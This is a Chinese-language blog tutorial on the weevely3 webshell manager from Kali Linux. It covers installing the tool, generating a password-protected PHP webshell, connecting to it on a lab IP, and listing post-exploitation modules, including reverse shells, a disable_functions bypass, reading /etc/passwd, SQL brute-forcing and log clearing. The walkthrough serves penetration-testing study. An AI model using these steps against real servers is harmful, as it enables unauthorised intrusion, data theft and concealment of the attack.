2021Kali系列 -- linux菜刀(weevely3)

gclome

原文链接：2021Kali系列 -- linux菜刀(weevely3)

人这辈子总是再等，等以后，等下次，等不忙，等有条件，等有时间，等有钱了，可是，后来呢。。。

----  网易云热评
简介：一款运行在linux系统上的webshell管理工具，可以实现Shell访问目标，以目标为中心的SQL控制台，HTTP / HTTPS代理浏览目标，上传和下载文件，生成反向和直接TCP Shell，审核远程目标安全，端口扫描以目标为中心，挂载远程文件系统，以目标为中心的Bruteforce SQL帐户。


一、下载地址（软件作者）
https://github.com/epinna/weevely3

二、安装使用
1、下载到本地

• 
  

git clone https://github.com/epinna/weevely3.git
2、进入到weebely3目录

• 
  

cd weebely3
3、安装需要的模块

• 
  

pip3 install -r requirements.txt
4、启动weevely.py

• 
  

./weevely.py
​
5、生成木马文件，在weebely3文件夹中会生成一个连接密码为123的shell.php

• 
  

./weevely.py generate 123 shell.php
​
​
6、上传shell文件到目标服务器
7、连接木马

./weevely.py http://192.168.139.129:81/shell.php 123
​
8、获取文件目录，dir
​
9、利用模块收集信息

• 
  

WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname
​
10、直接输入help，查看其它可利用模块
​

1. :shell_su                     通过更变使用者来执行shell命令，可以获得root权限来执行命令.                                            
   
2. :shell_sh                     执行 shell 命令.                                             
   
3. :shell_php                    执行 PHP 命令.                                                
   
4. :system_extensions            收集PHP和webserver扩展列表                           
   
5. :system_info                  收集系统信息                                          
   
6. :system_procs                 列出正在运行的进程                                             
   
7. :audit_disablefunctionbypass  使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本，并在远程服务器上运行伪系统shell     
   
8. :audit_etcpasswd              查看/etc/passwd文件                           
   
9. :audit_suidsgid               查找带有SUID或SGID标志的文件。
   
10. :audit_phpconf                查看php配置信息                                             
    
11. :audit_filesystem             审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录，模块仅默认搜索部分linux下的常见目录，logs、root、home等                        
    
12. :backdoor_reversetcp          执行反向TCP shell. 需要nc -lvp <port>监听                                       
    
13. :backdoor_tcp                 在TCP端口上生成shell                                         
    
14. :net_scan                     TCP端口扫描.                                                      
    
15. :net_mail                     发送邮件.                                                           
    
16. :net_ifconfig                 获取网络接口地址.                                    
    
17. :net_curl                     执行类似curl的HTTP请求.                                    
    
18. :net_proxy                    运行本地代理以通过目标转移HTTP / HTTPS浏览
    
19. :net_phpproxy                 在目标上安装PHP代理.                                    
    
20. :bruteforce_sql               可用来猜解数据库密码.                                             
    
21. :file_find                    查找具有给定名称和属性的文件.                          
    
22. :file_download                从远程文件系统下载文件.                                
    
23. :file_check                   获取文件的属性和权限.                           
    
24. :file_touch                   更改文件时间戳.                                               
    
25. :file_cd                      更改当前工作目录.                                    
    
26. :file_grep                    打印与多个文件中的模式匹配的行.                    
    
27. :file_gzip                    压缩或解压gzip文件.                                       
    
28. :file_tar                     压缩或解压tar文件.                                    
    
29. :file_enum                    检查路径列表的存在和权限
    
30. :file_bzip2                   压缩或解压bzip2文件.                                      
    
31. :file_mount                   使用HTTPfs挂载远程文件系统.                                
    
32. :file_clearlog                从文件中删除字符串.                                          
    
33. :file_zip                     压缩或解压zip文件.                                       
    
34. :file_cp                      复制单个文件.                                                   
    
35. :file_upload2web              自动将文件上传到Web文件夹并获取相应的URL.
    
36. :file_edit                    在本地编辑器上编辑远程文件.                                 
    
37. :file_read                    从远程文件系统中读取远程文件.                        
    
38. :file_webdownload             指定URL下载文件.                                                     
    
39. :file_upload                  文件上载到远程文件系统.                                    
    
40. :file_ls                      列出目录内容.                                             
    
41. :file_rm                      删除远程文件.                                                  
    
42. :sql_dump                     Multi dbms mysqldump replacement.                                    
    
43. :sql_console                  执行SQL查询或运行sql控制台.

复制代码